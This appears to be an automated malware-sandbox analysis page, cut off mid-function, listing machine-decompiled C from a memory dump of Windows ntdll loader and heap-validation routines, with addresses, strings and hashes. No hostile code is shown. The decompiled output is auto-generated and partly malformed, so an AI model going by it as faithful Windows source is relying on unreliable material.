0x1e464d13
0x1e464d13
0x1e464d16
0x1e464d18
0x1e464d29
0x1e464d2a
0x1e464d2c
0x1e464d34
0x1e464d1a
0x1e464d1a
0x1e464d1a
0x1e464d1d
0x1e464d1f
0x1e464d22
0x1e464d24
0x1e464d24
0x1e464d3c
0x1e464d3f
0x1e464d45
0x1e464d47
0x1e464d6c
0x1e464d6c
0x1e464d70
0x1e464d7e
0x1e464d84
0x1e464d84
0x00000000
0x1e464d49
0x1e464d49
0x1e464d56
0x1e464d56
0x1e464d59
0x00000000
0x00000000
0x1e464d4e
0x1e464d50
0x1e464d52
0x1e464d8e
0x1e464d5d
0x1e464d5f
0x1e464d67
0x00000000
0x1e464d67
0x1e464d54
0x1e464d54
0x1e464d5b
0x00000000
0x1e464d5b
0x1e464ce2
0x1e464ce2
0x1e464ce5
0x1e464ce5
0x1e464ce7
0x1e464cfb
0x1e464ce9
0x1e464ce9
0x1e464cec
0x1e464cef
0x1e464cf1
0x1e464cf3
0x1e464cf3
0x1e464cf3
0x1e464cf6
0x1e464cf6
0x1e464d02
0x1e464d05
0x00000000
0x00000000
0x1e464d07
0x1e464d0f
0x1e464d11
0x00000000
0x00000000
0x00000000
0x1e464d11
0x00000000
0x1e464ce5
0x1e464ce0
0x1e464c8a
0x1e464c8f
0x1e464c91
0x00000000
0x00000000
0x1e464c9d
0x00000000
0x1e464c9d
0x1e464c52
0x1e464c5f
0x1e464c5f
0x1e464c62
0x00000000
0x00000000
0x1e464c57
0x1e464c59
0x1e464c5b
0x1e464caa
0x1e464c66
0x1e464c68
0x1e464c70
0x1e464c75
0x00000000
0x1e464c75
0x1e464c5d
0x1e464c5d
0x1e464c64
0x00000000
0x1e464c64
0x1e464c17
0x1e464b75
0x1e464bc4
0x1e464bc8
0x00000000
0x00000000
0x1e464bd9
0x00000000
0x00000000
0x00000000
0x1e464b77
0x1e464b7a
0x1e464b8c
0x1e464b7c
0x1e464b7e
0x1e464b83
0x1e464b86
0x1e464b86
0x1e464b90
0x1e464b93
0x00000000
0x00000000
0x1e464b95
0x1e464bab
0x1e464bb0
0x00000000
0x00000000
0x1e464bb2
0x1e464bb9
0x00000000
0x00000000
0x1e464bbb
0x1e464bbe
0x1e464bc1
0x1e464bc1
0x00000000
0x1e464bc1
0x1e464b97
0x1e464ba4
0x00000000
0x00000000
0x1e464ba6
0x00000000
0x1e464ba6
0x1e464ea9
0x1e464ea9
0x1e464eb2
0x00000000

Strings

Heap block at %p has corrupted PreviousSize (%lx), xrefs: 1E464F81
HEAP[%wZ]: , xrefs: 1E464EE1, 1E464F0D, 1E464F5D, 1E464FBA, 1E46501D, 1E465061, 1E4650FA
Free Heap block %p modified at %p after it was freed, xrefs: 1E464F2F
Heap block at %p is not last block in segment (%p), xrefs: 1E464FD6
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 1E4650C6
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 1E46508C
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 1E465119
HEAP: , xrefs: 1E464F1A, 1E464F6A, 1E464FC7, 1E46502A, 1E46506E, 1E4650B6, 1E465107
Heap block at %p has incorrect segment offset (%x), xrefs: 1E46503B

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: a1048f572a15e62061f8db0d11982f9deba508d6f248d1db4a97c987392b7d97
Instruction ID: 52eed6eba6a17a61d90814f406072e1ad3497874519bdbe6a8e49026828f2ec3
Opcode Fuzzy Hash: a1048f572a15e62061f8db0d11982f9deba508d6f248d1db4a97c987392b7d97
Instruction Fuzzy Hash: 7312BF746106829FDB15CF69C490BB6B7F7FF48314F118A5AE4868B781D778E881CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D8E00, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 126
timeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E1E3D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1e49d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1e498464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1e495780 & 0x00000003) != 0) {
							E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1e495780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E1E3EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1e497984; // 0x6c2b28
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1e498464; // 0x74b10110
					 *0x1e49b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E1E3D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1e495780 & 0x00000005) != 0) {
						_push(_t49);
						E1E425510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x1e3d8e0f
0x1e3d8e16
0x1e3d8e19
0x1e3d8e1b
0x1e3d8e21
0x1e3d8e7f
0x1e3d8e85
0x1e419354
0x1e41936c
0x1e419371
0x1e41937b
0x1e419381
0x1e419381
0x1e41937b
0x1e3d8e9d
0x1e3d8e9d
0x1e3d8e29
0x1e3d8e2c
0x1e3d8e38
0x1e3d8e3e
0x1e3d8e43
0x1e3d8eb5
0x1e3d8eb9
0x1e4192aa
0x1e4192af
0x1e4192e8
0x1e4192e8
0x1e4192af
0x1e3d8eb9
0x1e3d8e45
0x1e3d8e53
0x1e3d8e5b
0x1e3d8e5f
0x1e3d8e78
0x1e3d8e78
0x1e3d8e7d
0x1e3d8ec3
0x1e3d8ecd
0x1e3d8ed2
0x1e3d8ed2
0x1e3d8ec5
0x1e3d8ec5
0x00000000
0x1e3d8e7d
0x1e3d8e67
0x1e3d8ea4
0x1e41931a
0x00000000
0x00000000
0x1e419320
0x1e3d8ea4
0x1e3d8e70
0x1e419325
0x1e419340
0x1e419345
0x1e419345
0x1e3d8e76
0x00000000
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 1E3D8E53

Strings

(+l, xrefs: 1E3D8E2C
minkernel\ntdll\ldrsnap.c, xrefs: 1E41933B, 1E419367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E41932A
Querying the active activation context failed with status 0x%08lx, xrefs: 1E419357
LdrpFindDllActivationContext, xrefs: 1E419331, 1E41935D

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID: DebugPrintTimes
String ID: (+l$LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-1215100063
Opcode ID: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
Instruction ID: e0526d5ec8df3a5b9409c9e9e0638c28807f8fa09bbff3364ffb9be08153f0c8
Opcode Fuzzy Hash: e3ae310800b2d119b1e4e1a7cc4c1b3997d21246b596edcaa751ef5fc2424314
Instruction Fuzzy Hash: 4C414A33D003569FDB14AB19CC98A69F2BEBB84204F86476AE90D67150E770FD888FD1

Uniqueness

Uniqueness Score: -1.00%

Function 1E464496, Relevance: 10.4, Strings: 8, Instructions: 417
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E1E464496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E1E4649A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x1e496378 = _t267;
						asm("int3");
						 *0x1e496378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E1E3D174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E1E3AB150();
							} else {
								E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E1E3AB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E1E3AB150();
							} else {
								E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E1E3AB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x1e496350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E1E3E9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E1E3D174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E1E3AB150();
										} else {
											E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E1E3AB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E1E3AB150();
									} else {
										E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E1E3AB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E1E3AB150();
								} else {
									E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E1E3AB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E1E3AB150();
							} else {
								E1E3AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E1E464AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E1E45FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E1E4523E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}

0x1e4644a1
0x1e4644a3
0x1e4644a7
0x1e4644ac
0x1e4644af
0x1e4644b2
0x1e4644b9
0x1e4644bc
0x1e4647f2
0x1e4647f2
0x1e4647f8
0x1e4647fc
0x1e4647fe
0x1e464804
0x1e464805
0x1e464805
0x1e46480c
0x1e464810
0x1e464812
0x1e464812
0x1e464812
0x1e464822
0x1e464822
0x1e464827
0x1e464827
0x00000000
0x1e464827
0x1e4644c4
0x1e4644d3
0x1e4644d9
0x1e4644dc
0x1e4644de
0x1e4644e0
0x1e464560
0x1e464520
0x1e464522
0x1e464525
0x1e464528
0x1e46452b
0x1e46452e
0x1e464530
0x1e464697
0x1e46469d
0x1e4646a1
0x1e4646c0
0x1e4646c5
0x1e4646a3
0x1e4646b8
0x1e4646bd
0x1e4646cb
0x1e4646d4
0x1e464677
0x1e464677
0x1e464679
0x1e46467c
0x1e46468a
0x1e464690
0x1e464690
0x1e4647f1
0x1e4647f1
0x1e4647f1
0x00000000
0x1e4647f1
0x1e464536
0x1e464539
0x1e46453c
0x1e464636
0x1e46463c
0x1e464640
0x1e46465f
0x1e464664
0x1e464642
0x1e464657
0x1e46465c
0x1e464670
0x00000000
0x1e464542
0x1e464542
0x1e464546
0x1e464548
0x1e46454b
0x1e464555
0x1e46455b
0x1e46455b
0x1e46455b
0x1e46455d
0x1e46455d
0x1e46455d
0x00000000
0x1e46455d
0x1e46453c
0x1e464579
0x1e46457c
0x1e464587
0x1e464589
0x1e464591
0x1e464592
0x1e464597
0x1e464598
0x1e4645a1
0x1e4645ab
0x1e4645ab
0x1e4645a1
0x1e4645ae
0x1e4645b4
0x1e4645b9
0x1e4645bd
0x1e464759
0x1e464759
0x1e46475f
0x1e464761
0x1e464763
0x1e464765
0x1e464768
0x1e46476b
0x1e46476d
0x1e46479c
0x1e46479c
0x1e46479f
0x1e4647a2
0x1e4647a4
0x1e464830
0x1e464833
0x1e464879
0x1e46487d
0x1e4648f1
0x1e4648f3
0x1e4648f3
0x00000000
0x1e4648f3
0x1e46487f
0x1e464885
0x1e464887
0x1e4648a8
0x1e4648a8
0x1e4648ae
0x1e4648b0
0x1e4648dc
0x1e4648dc
0x1e4648dc
0x1e4648dc
0x1e4648ec
0x00000000
0x1e4648ec
0x1e4648b2
0x1e4648bc
0x1e4648be
0x1e4648c1
0x00000000
0x00000000
0x00000000
0x00000000
0x1e4648c3
0x1e4648c3
0x1e4648c6
0x1e4648c9
0x1e4648cc
0x1e4648d1
0x1e4648d4
0x00000000
0x00000000
0x1e4648d6
0x1e4648d7
0x1e4648da
0x00000000
0x00000000
0x00000000
0x1e4648da
0x1e46494f
0x1e464955
0x1e464959
0x1e464978
0x1e46497d
0x1e46495b
0x1e464970
0x1e464975
0x1e464986
0x1e464987
0x1e46498a
0x1e46498d
0x1e464997
0x1e4647ef
0x1e4647ef
0x1e4647ef
0x00000000
0x1e4647ef
0x1e464890
0x1e464890
0x1e464891
0x1e464891
0x1e464894
0x1e464897
0x1e46489d
0x1e4648a0
0x00000000
0x00000000
0x1e4648a2
0x1e4648a3
0x1e4648a6
0x00000000
0x00000000
0x00000000
0x1e4648a6
0x1e4648fb
0x1e464901
0x1e464905
0x1e464924
0x1e464929
0x1e464907
0x1e46491c
0x1e464921
0x1e46492f
0x1e464935
0x1e464936
0x1e464939
0x1e464942
0x00000000
0x1e464947
0x1e464835
0x1e46483b
0x1e46483f
0x1e46485e
0x1e464863
0x1e464841
0x1e464856
0x1e46485b
0x1e464869
0x1e46486c
0x1e46486f
0x1e4647e7
0x1e4647e7
0x00000000
0x1e4647ec
0x1e4647aa
0x1e4647b0
0x1e4647b4
0x1e4647d3
0x1e4647d8
0x1e4647b6
0x1e4647cb
0x1e4647d0
0x1e4647de
0x1e4647df
0x1e4647e2
0x00000000
0x00000000
0x00000000
0x00000000
0x1e46476f
0x1e46476f
0x1e464778
0x1e464785
0x1e464787
0x1e46478c
0x1e46478e
0x00000000
0x00000000
0x1e464790
0x1e464792
0x1e464794
0x00000000
0x00000000
0x1e464796
0x1e464799
0x00000000
0x1e464799
0x00000000
0x1e4645c3
0x1e4645c3
0x1e4645c7
0x1e4645c7
0x1e4645ca
0x1e4645cf
0x1e4645d3
0x1e4645df
0x1e4645e4
0x1e4645e6
0x1e4645e8
0x1e4645ed
0x1e4645ed
0x1e4645f2
0x1e4645f2
0x1e4645f7
0x1e4645fc
0x1e464602
0x1e464606
0x1e464609
0x1e46460f
0x1e4646de
0x1e4646e3
0x1e4646e5
0x1e4646ec
0x1e4646ee
0x1e4646f6
0x1e4646f6
0x1e4646f6
0x1e4646f6
0x1e4646ec
0x1e464615
0x1e464615
0x1e46461d
0x1e46462e
0x1e46462e
0x1e46461d
0x1e46460f
0x1e464609
0x1e4646fd
0x00000000
0x00000000
0x1e464710
0x1e46471a
0x1e464720
0x1e464720
0x1e464722
0x1e46472c
0x00000000
0x1e46472e
0x1e46472e
0x00000000
0x1e46472e
0x1e46472c
0x1e464738
0x1e46473c
0x1e46474b
0x1e464751
0x1e464751
0x00000000
0x1e46473c
0x1e4648f4
0x1e4648f4
0x00000000
0x1e4648f4

Strings

dedicated (%04Ix) free list element %p is marked busy, xrefs: 1E4646CF
Total size of free blocks in arena (%Id) does not match number total in heap header (%Id), xrefs: 1E46486F
HEAP[%wZ]: , xrefs: 1E464652, 1E4646B3, 1E4647C6, 1E464851, 1E464917, 1E46496B
Number of free blocks in arena (%ld) does not match number in the free lists (%ld), xrefs: 1E4647E2
HEAP: , xrefs: 1E46465F, 1E4646C0, 1E4647D3, 1E46485E, 1E464924, 1E464978
Non-Dedicated free list element %p is out of order, xrefs: 1E46466B
Tag %04x (%ws) size incorrect (%Ix != %Ix) %p, xrefs: 1E464992
Pseudo Tag %04x size incorrect (%Ix != %Ix) %p, xrefs: 1E46493D

Memory Dump Source

Source File: 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 00000002.00000002.314209123.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.314215093.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
API String ID: 0-1357697941
Opcode ID: 8170114d219297f7357d6cc7324d87158fee6075e031bd33702e5ed17be3f58b
Instruction ID: b4a263c0800f2b25bac8a303077b01c3b058694a84a4c9ff1a564634c2b046c3
Opcode Fuzzy Hash: 8170114d219297f7357d6cc7324d87158fee6075e031bd33702e5ed17be3f58b
Instruction Fuzzy Hash: 89F1FE35A106859FCF15CFA5C890BAAB7F7FF49304F10872AE1869B741C734A985CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1E3CA309, Relevance: 8.2, Strings: 6, Instructions: 687
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E1E3CA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
